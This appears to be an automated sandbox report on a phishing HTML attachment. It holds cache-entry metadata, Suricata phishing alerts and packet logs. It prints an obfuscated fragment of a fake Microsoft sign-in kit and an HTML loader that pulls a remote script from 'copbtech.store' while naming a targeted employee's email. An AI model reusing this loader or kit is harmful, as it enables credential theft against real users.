Preview:	function _0x422a(_0x1e526e,_0x516891){var _0x49c9fb=_0x114c();return _0x422a=function(_0x296a38,_0x3228ba){_0x296a38=_0x296a38-0x156;var _0x4b2f98=_0x49c9fb[_0x296a38];return _0x4b2f98;},_0x422a(_0x1e526e,_0x516891);}function _0x114c(){var _0x30589e=['Forgot\x20Password?','status','16px','4MwKLAu','none','text/css','Privacy\x20statement','2faerror','<div\x20class=\x22text-right\x22><button\x20type=\x22button\x22\x20class=\x22btn\x20rounded-0\x20text-white\x20px-4\x22\x20id=\x22submit-btn\x22\x20style=\x22background-color:\x20#0066BA;\x22>Sign\x20In</button></div>','load','#f2f2f2','1px\x20solid\x20#ddd','.logoname','#next','cursor','translate(-50%,\x20-50%)','34334TyiVJj','approve_signin','#sign-in-another-way','(((.+)+)+)+$','keypress','div7','#back-text','20px\x2020px','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2230px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20

Chrome Cache Entry: 78

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	dropped
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 79

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	21
Entropy (8bit):	3.594465636961452
Encrypted:	false
SSDEEP:	3:YMb1gXME2Y:YMeX32Y
MD5:	909AD59B6307B0CD8BFE7961D4B98778
SHA1:	49F8111D613317EA86C6A45CD608DC96B1C8451B
SHA-256:	FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
SHA-512:	8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
Malicious:	false
URL:	https://api.ipify.org/?format=json
Preview:	{"ip":"8.46.123.189"}

Chrome Cache Entry: 80

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	dropped
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 81

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	21
Entropy (8bit):	3.594465636961452
Encrypted:	false
SSDEEP:	3:YMb1gXME2Y:YMeX32Y
MD5:	909AD59B6307B0CD8BFE7961D4B98778
SHA1:	49F8111D613317EA86C6A45CD608DC96B1C8451B
SHA-256:	FBCEC43F243A7B7F955E498B7FC37CB5EDF615156529AB8A039BBBCFA52C1829
SHA-512:	8FDFFFB73C90ACDC732A0F29257CACEEDAAA28FCAF8E779C5390BDEA9CDE4DE3C8BD005BBEC9B3B7972C787E233D8D8E218D45B6EB2C3AD40EB5E3A2A1EAC3B8
Malicious:	false
Preview:	{"ip":"8.46.123.189"}

Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	258966
Entropy (8bit):	4.694760038815572
Encrypted:	false
SSDEEP:	1536:Pq6wJpJW3jInCU77Pc5ybMMHcFdL5RdD0BKt2AnsD5FWXxXLXv47pGXRMN6o8VbB:dLzsCXo8cAcfO4FIwo7vwI7N
MD5:	D22C8D1F87B47309F3C2A05D2905A762
SHA1:	2DA99CB33FCB4294336D73F2D538ED2D5EC3E3C1
SHA-256:	CA4586C1819D057F7396D917087FE3E650A9466DE644278DC3A8DDA5C3CA71FD
SHA-512:	F96C4580DEDBCA6B830EB4959E45831D3B87231F54F8B4EFE825615E88335550ABD42EBDF8FCCF40631047B0321D0EA8E0D5438F65B7B6E06FEB5253355F4F20
Malicious:	false
URL:	https://sopbtech.store/start/xls/includes/css6.css
Preview:	/!.. Bootstrap v4.0.0 (https://getbootstrap.com).. * Copyright 2011-2018 The Bootstrap Authors.. * Copyright 2011-2018 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */.. :root {.. --blue: #007bff;.. --indigo: #6610f2;.. --purple: #6f42c1;.. --pink: #e83e8c;.. --red: #dc3545;.. --orange: #fd7e14;.. --yellow: #ffc107;.. --green: #28a745;.. --teal: #20c997;.. --cyan: #17a2b8;.. --white: #fff;.. --gray: #6c757d;.. --gray-dark: #343a40;.. --primary: #007bff;.. --secondary: #6c757d;.. --success: #28a745;.. --info: #17a2b8;.. --warning: #ffc107;.. --danger: #dc3545;.. --light: #f8f9fa;.. --dark: #343a40;.. --breakpoint-xs: 0;.. --breakpoint-sm: 576px;.. --breakpoint-md: 768px;.. --breakpoint-lg: 992px;.. --breakpoint-xl: 1200px;.. --font-family-sans-se

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32065)
Category:	downloaded
Size (bytes):	85578
Entropy (8bit):	5.366055229017455
Encrypted:	false
SSDEEP:	1536:EYE1JVoiB9JqZdXXe2pD3PgoIiulrUndZ6a4tfOR7WpfWBZ2BJda4w9W3qG9a986:v4J+OlfOhWppCW6G9a98Hr2
MD5:	2F6B11A7E914718E0290410E85366FE9
SHA1:	69BB69E25CA7D5EF0935317584E6153F3FD9A88C
SHA-256:	05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
SHA-512:	0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
Malicious:	false
URL:	https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Preview:	/! jQuery v2.2.4 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call

Chrome Cache Entry: 84

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	downloaded
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
URL:	https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 85

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (32030)
Category:	downloaded
Size (bytes):	86709
Entropy (8bit):	5.367391365596119
Encrypted:	false
SSDEEP:	1536:9NhEyjjTikEJO4edXXe9J578go6MWXqcVhrLyB4Lw13sh2bzrl1+iuH7U3gBORDT:jxcq0hrLZwpsYbmzORDU8Cu5
MD5:	E071ABDA8FE61194711CFC2AB99FE104
SHA1:	F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
SHA-256:	85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
SHA-512:	53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
Malicious:	false
URL:	https://code.jquery.com/jquery-3.1.1.min.js
Preview:	/! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con

Chrome Cache Entry: 86

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	downloaded
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Static File Info

General

File type:	HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Entropy (8bit):	4.981698048498484
TrID:	Text - UTF-8 encoded (3003/1) 100.00%
File name:	ATT-897850.htm
File size:	330 bytes
MD5:	d4911b7850cfbc2463b803717c533ad9
SHA1:	bde220a084cb2b2942e68bdb96f5f9b983482808
SHA256:	95b1f4d7e0b52510be839b0803dc7adb91f4d08d50fcd81117e90a7607899d88
SHA512:	e96c73fdcb401d523643d18da337d2804346605fdfd920bad3ed8af97caed2fc3de3d6f3857cf2f24c28cc6074d23fbb431adb15c36672a0e41092898b779752
SSDEEP:	6:rzQ4QzhqIRY0Mf7fYzUfYoi+8mgO9l3EKf8FA/XLbcG/rMWXfGb:r8Pqf7fYzZHu35f8Yb3/rMWPGb
TLSH:	59E026192C61C86419B595B76274E568B54120522050F24AB4DCE41B1F60BD1CD03DD0
File Content Preview:	...<!DOCTYPE html>..<html lang="en">..<meta charset="UTF-8">..<body>.. <script>.. var uid = 'anna.duerksen@bbraun.com';.. var script = document.createElement('script');.. script.src = "https://copbtech.store/tsk/xls/t1s2kc2v.js";..

File Icon


Icon Hash:	173149cccc490307

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-22T12:02:42.909173+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49770	162.0.209.120	443	TCP
2025-01-22T12:03:06.596430+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49772	162.0.209.120	443	TCP
2025-01-22T12:03:39.234166+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	49890	162.0.209.120	443	TCP
2025-01-22T12:04:24.284466+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	50045	162.0.209.120	443	TCP
2025-01-22T12:05:23.073678+0100	2847819	ETPRO PHISHING Successful Generic Phish 2021-03-25	1	192.168.2.4	50047	162.0.209.120	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 22, 2025 12:02:12.441193104 CET	49675	443	192.168.2.4	173.222.162.32
Jan 22, 2025 12:02:16.596923113 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:16.597003937 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:16.597074986 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:16.598378897 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:16.598411083 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:16.882900000 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:16.882947922 CET	443	49736	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:16.883017063 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:16.883371115 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:16.883392096 CET	443	49736	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.305134058 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.305366993 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.305396080 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.306370974 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.306441069 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.307559013 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.307622910 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.307694912 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.355336905 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.491445065 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.491527081 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.611973047 CET	443	49736	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.612226963 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.612245083 CET	443	49736	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.613312960 CET	443	49736	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.613400936 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.614051104 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.614119053 CET	443	49736	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.669126987 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.669152975 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.669207096 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.669235945 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.669238091 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.669235945 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.669255972 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.669287920 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.669290066 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.669308901 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.669342041 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.669372082 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.679507971 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.679531097 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.679548025 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.679570913 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.679586887 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.679616928 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.679626942 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.679646015 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.679672956 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.679693937 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.679708004 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.679735899 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.690023899 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.690037012 CET	443	49736	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.715609074 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.715635061 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.715670109 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.715687037 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.715701103 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.715703011 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.715723038 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.715745926 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.715756893 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.715764046 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.715930939 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.716000080 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.716173887 CET	49734	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.716203928 CET	443	49734	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.763950109 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.763994932 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.764158964 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.764373064 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:17.764394045 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:17.879358053 CET	49736	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.502068043 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.528733969 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.528754950 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.532407045 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.532496929 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.532905102 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.533026934 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.533440113 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.533451080 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.589140892 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.891993046 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.892055035 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.892076015 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.892105103 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.892124891 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.892146111 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.892162085 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.892162085 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.892179012 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.892199993 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.892199993 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.892230988 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.892290115 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.892357111 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.894860029 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.894901991 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.894927979 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.894936085 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.895081997 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.943856955 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.944010973 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.944022894 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.944068909 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.944072962 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:18.944144964 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.944613934 CET	49739	443	192.168.2.4	162.0.209.120
Jan 22, 2025 12:02:18.944634914 CET	443	49739	162.0.209.120	192.168.2.4
Jan 22, 2025 12:02:20.668217897 CET	49742	443	192.168.2.4	142.250.184.228
Jan 22, 2025 12:02:20.668268919 CET	443	49742	142.250.184.228	192.168.2.4
Jan 22, 2025 12:02:20.668343067 CET	49742	443	192.168.2.4	142.250.184.228
Jan 22, 2025 12:02:20.668556929 CET	49742	443	192.168.2.4	142.250.184.228
Jan 22, 2025 12:02:20.668565035 CET	443	49742	142.250.184.228	192.168.2.4
Jan 22, 2025 12:02:21.335670948 CET	443	49742	142.250.184.228	192.168.2.4
Jan 22, 2025 12:02:21.335941076 CET	49742	443	192.168.2.4	142.250.184.228
Jan 22, 2025 12:02:21.335956097 CET	443	49742	142.250.184.228	192.168.2.4
Jan 22, 2025 12:02:21.337109089 CET	443	49742	142.250.184.228	192.168.2.4
Jan 22, 2025 12:02:21.337171078 CET	49742	443	192.168.2.4	142.250.184.228
Jan 22, 2025 12:02:21.338280916 CET	49742	443	192.168.2.4	142.250.184.228
Jan 22, 2025 12:02:21.338351965 CET	443	49742	142.250.184.228	192.168.2.4
Jan 22, 2025 12:02:21.392460108 CET	49742	443	192.168.2.4	142.250.184.228
Jan 22, 2025 12:02:21.392498016 CET	443	49742	142.250.184.228	192.168.2.4
Jan 22, 2025 12:02:21.439708948 CET	49742	443	192.168.2.4	142.250.184.228
Jan 22, 2025 12:02:27.543389082 CET	49723	80	192.168.2.4	2.22.50.117
Jan 22, 2025 12:02:27.548892975 CET	80	49723	2.22.50.117	192.168.2.4
Jan 22, 2025 12:02:27.548948050 CET	49723	80	192.168.2.4	2.22.50.117
Jan 22, 2025 12:02:28.182269096 CET	49749	443	192.168.2.4	199.188.200.183
